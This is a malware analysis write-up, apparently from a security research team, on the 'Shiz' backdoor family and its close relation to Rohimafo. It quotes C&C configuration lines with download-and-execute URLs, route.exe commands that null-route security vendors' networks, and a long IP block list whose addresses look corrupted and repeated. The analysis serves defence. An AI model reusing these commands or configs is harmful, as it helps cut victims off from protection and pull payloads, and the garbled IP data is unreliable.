Shiz and Rohimafo: Malware Cousins
Over the course of the last few weeks, our malware sandboxes have analyzed several interesting specimens with malicious activities that include the making of significant modifications to the routing table on the victim host; the effect of these changes is to essentially null-route a large number of /24 IP blocks, one of which is assigned to the U. S. Department of Justice.
As usual, the malicious activity begins with the running of an initial dropper executable. This dropper immediately copies itself verbatim into the Windows system directory with an (apparently) randomly generated new file name; examples include 5b8388e0.exe, 593a1edf.exe, and d4f11d84.exe.
The malware then adds an entry to the following Registry key to ensure that the installed version of itself is launched each time the machine restarts:
It then launches the installed copy of itself and exits and, as usual, this second process deletes the original sample from the file system. The dropped malware then injects code into a svchost.exe process, and proceeds to make an initial network connection to its C&C server. This connection consists of an HTTP GET request to a PHP script with two parameters, such as:
We have always observed the same DWORD value for the first parameter, but have seen at least six different values for the “seller ID” string, including:
seller-01 seller-15 seller-23 seller-25 seller-28
and even, in some dropper samples analyzed back in May 2010:
It is noteworthy that there is no User-Agent provided in this request; in fact, the only HTTP header field present at all is the “Host:” field.
The response from the C&C server included headers that indicated it was powered by Apache/2 with PHP version 5.2.13. The response consists of a short configuration file in plain text; a representative example is below:
!config borgherres.com biologyfozzie.com b1642ckt.com 7200 !load !68 http://blachowicz.com/ipybnknatrcsae.php?id=1&magic=280736572 7200
In some cases, but not always, the first domain name in the “!config” section is the same as the C&C domain.
The “!load” section contains a URL to download and execute. In our observations, this URL always contains a randomly-named PHP script with two parameters: an “id” parameter that is always set to 1, and a “magic” parameter that contains a (seemingly) random 9-digit number. Other representative examples of load commands include:
!load !67 http://b00ger01.com/zt6bgzqn6ww7mz0.php?id=1&magic=866125628 !load !66 http://b0000c454d.com/Hl5OjvG4dRIqx2Y.php?id=1&magic=302293400
The meaning of the numerical “7200” values is not known; perhaps this indicates the number of seconds to wait before checking in again to the C&C server. We have also observed the values of 4500 instead of 7200 in some cases.
Upon receipt of the load command, the malware will make another HTTP GET request to the first C&C listed in the aforementioned “!config” section; this C&C is often the same C&C that it initially contacts, but sometimes it sends its acknowledgment to a different C&C hostname as specified in the “!config”; again, only a single “Host:” HTTP header is included in this request. The response headers from the download server also indicate that it is powered by the same web server software as the initial C&C: Apache/2 with PHP 5.2.13.
Although the response header from the download server indicates that the downloaded content is HTML, in actuality it is a large (100KB or more) block of raw binary data. As it turns out, the downloaded data is really a new executable file that has been weakly obfuscated by XORing against the DWORD 0xA0A0A0A0. After the download completes, the malware sends an acknowledgment message to the C&C; this acknowledgment consists of another HTTP GET request to the original URL, but with a third GET parameter appended indicating that the “!load” command succeeded:
Note that the request value of “68” was included within the load command as “!68”. Over the course of several days, we have observed the values of this number slowly increment from 66, to 67, to 68; this suggests it could be a revision number of some kind. The C&C sends an HTTP response to this acknowledgment containing headers but no bytes of content.
Once the downloaded data is written to the file system, it is XORed against 0xA0A0A0A0 to return it to its original executable form, and then executed. The file name used is generated according to a pattern exemplified by the following representative samples:
C:WINDOWSTEMPntE808.tmp.exe C:WINDOWSTEMPntA2EC.tmp.exe C:WINDOWSTEMPntEBEB.tmp.exe
Once executed, the dropped malware moves itself from C:WindowsTEMP to C:WindowsSystem32 as a randomly-generated new file name, such as:
uwlfoh.exe xnkhpi.exe eiqchz.exe
It then restarts itself and begins the process of making permanent modifications to the victim computer’s routing table in order to block access to a list of 205 separate /24 IP blocks. The list of IP blocks that it null-routes is embedded (in obfuscated form) in the downloaded executable; although a strings analysis of the static binary did not yield any IP addresses, a memory dump of the executing process contained a list of 205 ASCII strings associated with the IP blocks to be null-routed.
The malware proceeds down this list and invokes the Windows route.exe command twice for each IP block:
route.exe -p add 126.96.36.199 mask 255.255.255.0 172.XX.YY.0 route.exe -p add 188.8.131.52 mask 255.255.255.0 0.0.0.255
In our experiments on a Windows XP box, the second route.exe command will fail due to the specified gateway (0.0.0.255) being invalid, but the first route.exe command will succeed and has the effect of null-routing target IP block (184.108.40.206/24 in this case, assigned to UC-Santa Barbara) due to the non-existence of a host with IP address 172.XX.YY.0. Note that the form of the non-existent gateway appears to be generated dynamically from the IP of the victim machine (which, in the above case, had an RFC1918 IP address of 172.XX.YY.ZZ.)
The complete list of IP blocks that the malware attempts to null-route, along with their associated network names and country codes, is as follows:
AT 220.127.116.11 TECHNISCHE UNIVERSITAT WIEN AT 18.104.22.168 TECHNISCHE UNIVERSITAT WIEN BY 22.214.171.124 TUT.BY CH 126.96.36.199 NINE INTERNET SOLUTIONS AG SWITZERLAND CZ 188.8.131.52 TARIO OF NEW YORK CZ 184.108.40.206 COLGATE-PALMOLIVE CESKA REPUBLIKA SPOL. S R.O CZ 220.127.116.11 NETCENTRUM DE 18.104.22.168 NETWORK ADDRESS DE 22.214.171.124 INFRASTRUCTURE DE 126.96.36.199 INSOFT EDV-SYSTEME GMBH BERLIN DE 188.8.131.52 CABLE & WIRELESS TELECOMMUNICATION SERVICES GMBH DE 184.108.40.206 NTT/VERIO EUROPE DE 220.127.116.11 AVIRA GMBH DE 18.104.22.168 SKYLIME GBR DE 22.214.171.124 GRID-SERVICE-GMBH DE 126.96.36.199 VSERVER - VIRTUAL DEDICATED SERVER-HOSTING DE 188.8.131.52 SERVER4YOU DEDICATED SERVER HOSTING DE 184.108.40.206 HETZNER ONLINE AG DE 220.127.116.11 DEUTSCHE TELEKOM AG DE 18.104.22.168 HOLTZBRINCK ONLINE SERVICES GMBH DE 22.214.171.124 AVIRA GMBH DE 126.96.36.199 HOSTEUROPE GMBH DE 188.8.131.52 AIXTRANET HERZOGENRATH DE 184.108.40.206 1&1 INTERNET AG DE 220.127.116.11 SEDO DOMAIN PARKING DE 18.104.22.168 STRATO RECHENZENTRUM BERLIN DE 22.214.171.124 ELEMENT5 AG - A DIGITALRIVER COMPANY DE 126.96.36.199 1&1 INTERNET AG DE 188.8.131.52 1&1 INTERNET AG DE 184.108.40.206 HOSTEUROPE GMBH EE 220.127.116.11 DIAPOL GRANITE OY EE 18.104.22.168 MODERA CONSULTING O ES 22.214.171.124 DIRECCION GENERAL DE TRAFICO ES 126.96.36.199 GIPUZKOA EMPLOYERS ASSOCIATION ES 188.8.131.52 IP ADDRESSES FOR JAZZTELBONE CLIENTS FI 184.108.40.206 F-SECURE OYJ FI 220.127.116.11 F-SECURE FR 18.104.22.168 NORDNET SA FR 22.214.171.124 NORDNET FR 126.96.36.199 MFX-BORDEAUX FR 188.8.131.52 FRANCE TELECOM FR 184.108.40.206 RDMEDIAS FR 220.127.116.11 OVH SAS FR 18.104.22.168 OVH SAS GR 22.214.171.124 FOUNDATION OF RESEARCH AND TECHNOLOGY HELLAS HU 126.96.36.199 INTERWARE INC IE 188.8.131.52 NETWORK FOR FTP.HEANET.IE SERVICES IE 184.108.40.206 LETSHOST IE 220.127.116.11 AMAZON WEB SERVICES ELASTIC COMPUTE CLOUD EC2 EU IL 18.104.22.168 ELRON TECHNOLOGIES IS 22.214.171.124 FRIDRIK SKULASON HF JP 126.96.36.199 JAPAN NETWORK INFORMATION CENTER NL 188.8.131.52 IP-EEND NL 184.108.40.206 XS4ALL INTERNET BV NL 220.127.116.11 IS INTERNED SERVICES NL 18.104.22.168 KDIS NL 22.214.171.124 EUROACCESS NL 126.96.36.199 LEASEWEB NO 188.8.131.52 NORMAN DATA DEFENCE SYSTEMS AS LYSAKER NO 184.108.40.206 NORMAN DATA DEFENCE SYSTEMS AS LYSAKER NO 220.127.116.11 LINPRO AS PH 18.104.22.168 PHILIPPINE TELEGRAPH AND TELEPHONE CORPORATION RO 22.214.171.124 INFRA-AW RU 126.96.36.199 PETERSBURG INTERNET NETWORK LLC RU 188.8.131.52 IO-HOSTS LTD RU 184.108.40.206 MASTAK-TELECOM RU 220.127.116.11 MASTERHOST.RU IS A HOSTING AND TECHNICAL SUPPORT ORGANIZATION RU 18.104.22.168 HTTP://WWW.NIKAMOTORS.RU RU 22.214.171.124 KASPERSKY LAB RU 126.96.36.199 CHRONOPAY B.V RU 188.8.131.52 SAINT-PETERSBURG DEPARTMENT MAJORDOMO LLC RU 184.108.40.206 KASPERSKY LABS RU 220.127.116.11 RTCOMM.RU NETWORK RU 18.104.22.168 RTCOMM.RU NETWORK RU 22.214.171.124 ESERVER.RU - HOSTING OPERATOR RU 126.96.36.199 JSC CENTRAL TELECOMMUNICATION COMPANY BRANCH BELSVYAZ RU 188.8.131.52 CORBINA TELECOM RU 184.108.40.206 .MASTERHOST RU 220.127.116.11 MASTERHOST VPS SERVICES RU 18.104.22.168 MASTERHOST IS A HOSTING AND TECHNICAL SUPPORT ORGANIZATION RU 22.214.171.124 MASTERHOST IS A HOSTING AND TECHNICAL SUPPORT ORGANIZATION RU 126.96.36.199 MASTERHOST IS A HOSTING AND TECHNICAL SUPPORT ORGANIZATION RU 188.8.131.52 MASTERHOST IS A HOSTING AND TECHNICAL SUPPORT ORGANIZATION RU 184.108.40.206 AGAVA JSC RU 220.127.116.11 GARANT-PARK-TELECOM LTD RU 18.104.22.168 MASTERHOST VPS SERVICES RU 22.214.171.124 TW NETWORK SOLUTION RU 126.96.36.199 COLOCATION SERVICES SK 188.8.131.52 VNET A.S UA 184.108.40.206 LUCKY NET (COLLOCATION) UA 220.127.116.11 FREEHOST UA UA 18.104.22.168 HOSTPRO LTD UA 22.214.171.124 ELEKTRONNI VISTI LTD (ELVISTI LTD) KYIV UKRAINE UA 126.96.36.199 VELTON.TELECOM GPON K12 NETWORK UK 188.8.131.52 EUROPEAN REGIONAL REGISTRY UK 184.108.40.206 LEVEL 3 COMMUNICATIONS UK 220.127.116.11 UK'S LARGEST WEB HOSTING COMPANY UK 18.104.22.168 SOPHOS UK 22.214.171.124 APPENSE UK 126.96.36.199 UK NOC UK 188.8.131.52 AKAMAI TECHNOLOGIES UK 184.108.40.206 INTEROUTE COMMUNICATIONS LIMITED UK 220.127.116.11 COMODO CA LTD UK 18.104.22.168 COMODO CA LTD UK 22.214.171.124 AKAMAI TECHNOLOGIES UK 126.96.36.199 NET MEDIA PLANET IP SPACE UK 188.8.131.52 LIMELIGHT NETWORKS INC US 184.108.40.206 UNIVERSITY OF CALIFORNIA SANTA BARBARA US 220.127.116.11 COMPUTER ASSOCIATES INTERNATIONAL US 18.104.22.168 US DEPT OF JUSTICE US 22.214.171.124 COMPUTER ASSOCIATES INTERNATIONAL US 126.96.36.199 SUSQUEHANNA FIRE US 188.8.131.52 CORPORATION SERVICE COMPANY US 184.108.40.206 XMISSION L.C US 220.127.116.11 THEPLANET.COM INTERNET SERVICES INC US 18.104.22.168 THEPLANET.COM INTERNET SERVICES INC US 22.214.171.124 THEPLANET.COM INTERNET SERVICES INC US 126.96.36.199 THEPLANET.COM INTERNET SERVICES INC US 188.8.131.52 MASSACHUSETTS INSTITUTE OF TECHNOLOGY US 184.108.40.206 SYMANTEC CORPORATION US 220.127.116.11 FLUID HOSTING LLC US 18.104.22.168 NETWORK SOLUTIONS LLC US 22.214.171.124 LEVEL 3 COMMUNICATIONS INC US 126.96.36.199 CONXION CORPORATION US 188.8.131.52 THEPLANET.COM INTERNET SERVICES INC US 184.108.40.206 THEPLANET.COM INTERNET SERVICES INC US 220.127.116.11 MICROSOFT CORP US 18.104.22.168 MICROSOFT CORP US 22.214.171.124 MICROSOFT CORP US 126.96.36.199 LEGISLATIVE COUNCIL SERVICE US 188.8.131.52 SOFTLAYER TECHNOLOGIES INC US 184.108.40.206 SOFTLAYER TECHNOLOGIES INC US 220.127.116.11 DIGITAL RIVER INC US 18.104.22.168 INTERALAB US 22.214.171.124 NTT AMERICA INC US 126.96.36.199 HOPONE INTERNET CORPORATION US 188.8.131.52 WCP/32POINTS INTERMEDIATE HOLDING COMPANY INC US 184.108.40.206 BLACKMESH INC US 220.127.116.11 THEPLANET.COM INTERNET SERVICES INC US 18.104.22.168 THEPLANET.COM INTERNET SERVICES INC US 22.214.171.124 CHECK POINT SOFTWARE TECHNOLOGIES INC US 126.96.36.199 SYMANTEC CORPORATION US 188.8.131.52 SERVERVAULT CORP US 184.108.40.206 CNET NETWORKS INC US 220.127.116.11 HOSTFORWEB INC US 18.104.22.168 MCAFEE INC US 22.214.171.124 MCAFEE INC US 126.96.36.199 CODERO US 188.8.131.52 TREND MICRO INCORPORATED US 184.108.40.206 PSINET INC US 220.127.116.11 WS/AKAMAI TECHNOLOGIES/AKAMAI TECHNOLOGIES US 18.104.22.168 TW TELECOM HOLDINGS INC US 22.214.171.124 TITAN NETWORKS US 126.96.36.199 GODADDY.COM INC US 188.8.131.52 THEPLANET.COM INTERNET SERVICES INC US 184.108.40.206 JUSTIA INC US 220.127.116.11 MCAFEE INC US 18.104.22.168 HOSTWAY CORPORATION US 22.214.171.124 VIAWEST US 126.96.36.199 FREEZE FRAME GRAPHICS US 188.8.131.52 MICROSOFT CORP US 184.108.40.206 MICROSOFT CORP US 220.127.116.11 PEER 1 DEDICATED HOSTING US 18.104.22.168 NAME INTELLIGENCE INC US 22.214.171.124 QCC QWEST US 126.96.36.199 NATIONAL EDUCATION ASSOCIATION US 188.8.131.52 OUR INTERNET INC US 184.108.40.206 SLY.TV US 220.127.116.11 THEPLANET.COM INTERNET SERVICES INC US 18.104.22.168 ROUNDHOUSE LLC US 22.214.171.124 LIQUID WEB INC US 126.96.36.199 LIQUID WEB INC US 188.8.131.52 SOURCEFIRE INC US 184.108.40.206 LIMESTONE NETWORKS INC US 220.127.116.11 INVISION.COM INC US 18.104.22.168 THEPLANET.COM INTERNET SERVICES INC US 22.214.171.124 THEPLANET.COM INTERNET SERVICES INC US 126.96.36.199 THEPLANET.COM INTERNET SERVICES INC US 188.8.131.52 LAYERED TECHNOLOGIES INC US 184.108.40.206 RACKSPACE HOSTING US 220.127.116.11 RACKSPACE HOSTING US 18.104.22.168 BEORRATECH US 22.214.171.124 RACKSPACE HOSTING US 126.96.36.199 GOOGLE INC US 188.8.131.52 1&1 INTERNET INC US 184.108.40.206 1&1 INTERNET INC US 220.127.116.11 LUNAR PAGES US 18.104.22.168 THEPLANET.COM INTERNET SERVICES INC US 22.214.171.124 THEPLANET.COM INTERNET SERVICES INC US 126.96.36.199 THEPLANET.COM INTERNET SERVICES INC US 188.8.131.52 THEPLANET.COM INTERNET SERVICES INC US 184.108.40.206 THEPLANET.COM INTERNET SERVICES INC US 220.127.116.11 THEPLANET.COM INTERNET SERVICES INC US 18.104.22.168 THEPLANET.COM INTERNET SERVICES INC US 22.214.171.124 THEPLANET.COM INTERNET SERVICES INC US 126.96.36.199 THEPLANET.COM INTERNET SERVICES INC US 188.8.131.52 SOFTLAYER TECHNOLOGIES INC US 184.108.40.206 CLIENT INTELLECT INC US 220.127.116.11 THEPLANET.COM INTERNET SERVICES INC US 18.104.22.168 THEPLANET.COM INTERNET SERVICES INC US 22.214.171.124 THEPLANET.COM INTERNET SERVICES INC US 126.96.36.199 THEPLANET.COM INTERNET SERVICES INC US 188.8.131.52 THEPLANET.COM INTERNET SERVICES INC US 184.108.40.206 THEPLANET.COM INTERNET SERVICES INC US 220.127.116.11 HOSTWAY TPA FL
Upon completion of the null-routing tasks, the malware connects to a new C&C and submits an HTTP GET request to a URL such as:
Note the use of a “knok.php” script instead of “knock.php” as was used for the initial C&C. Note also that the malware submits the name of the victim computer (VICTIM) along with information regarding the operating system and service pack status.
This 2nd C&C responds with another configuration-like file, such as:
!new_config besprutaness.com buffeter.com bjerkeseth.com/iOsVnczZv5NIYH8.php
This response prompts the malware to download yet another file from the specified PHP script; the downloaded file is (again) a new executable that has been obfuscated by XORing against 0xA0A0A0A0, and is saved to the following location:
This download server was running slightly older software versions (Apache and PHP 5.2.12 instead of Apache/2 and PHP 5.2.13 as above.)
The malware also injects code into various processes, including EXPLORER.EXE and IEXPLORE.EXE; we have studied neither the behavior nor purpose of this injected code.
Finally, the malware opens up a listening socket on TCP port 14336, and then informs the C&C by sending a final HTTP request to a URL such as:
We have not verified this via reverse engineering, but it seems reasonable to assume that the intention of the opened port might be to serve as a SOCKS proxy.
The dropped malware uses the following mutex to prevent multiple copies of itself from running simultaneously:
Virus detection coverage for the original droppers, as compiled by VirusTotal.com, ranged from 34% to 68% at the time of our analysis, but has improved significantly in the last couple weeks. Typical detections include:
Backdoor/Win32.Shiz.gen (Antiy-AVL) Backdoor.Win32.Shiz!IK (Emsisoft) W32/Shiz!tr.bdr (Fortinet) Backdoor.Win32.Shiz (Ikarus) Backdoor.Win32.Shiz.gen (Kaspersky) Backdoor.Shiz.JJ (VirusBuster) Trojan:Win32/Meredrop (Microsoft) W32/Meredrop.FK (Norman)
As far as the dropped (null-routing) malware is concerned, virus detection coverage was not great (about 15%) around the time the sample was first studied, but has since improved over the last few weeks in many cases.
Based on these detections, we have begun using the moniker “Shiz” internally for this family. MD5 hashes and file sizes for the initial dropper samples we’ve seen include:
64ed993299dc40da0822272fd600cf78 (34,816 bytes) bb9449e02df8d67a6e2e3a60d8f317b6 (40,448 bytes) 527ad0b6464631ff1dc07b5f282c0d7d (38,400 bytes)
MD5 hashes (after de-XORing) and file sizes for the dropped null-routing malware include:
aa66aea4c2cbc9de17e213d334131699 (130,560 bytes) 3f6cedccf1d37de2b9957c06437017f7 (105,984 bytes) 56ee94a95ab2ecb41be357f414de533c (107,520 bytes)
Based on our observations, the C&C servers for this family tend to be hosted in Kazakhstan and Ukraine, and the download servers (where the null-routing malware component lives) are hosted in Russia.
By most counts, the behavior of Shiz is very similar to that of another malware family known as Rohimafo, and described in detail here.
The similarities include the following:
- The knock.php/knok.php URLs for connecting to the C&C;
- The null-routing of over 200 /24 IP blocks;
- The opening of a listening socket (probably a SOCKS proxy);
- The injection of code into EXPLORER.EXE and IEXPLORE.EXE;
- Similar modifications to the Registry;
In fact, the 205 IP blocks null-routed by our Shiz samples include the identical 201 blocks null-routed by Rohimafo, plus the following four additions:
EE 18.104.22.168 DIAPOL GRANITE OY RU 22.214.171.124 IO-HOSTS LTD RU 126.96.36.199 KASPERSKY LABS US 188.8.131.52 THEPLANET.COM INTERNET SERVICES INC
Based on these similarities, we have concluded that either Shiz and Rohimafo are essentially the same family of malware, or at the very least that Shiz is a very close descendant and/or variant of Rohimafo.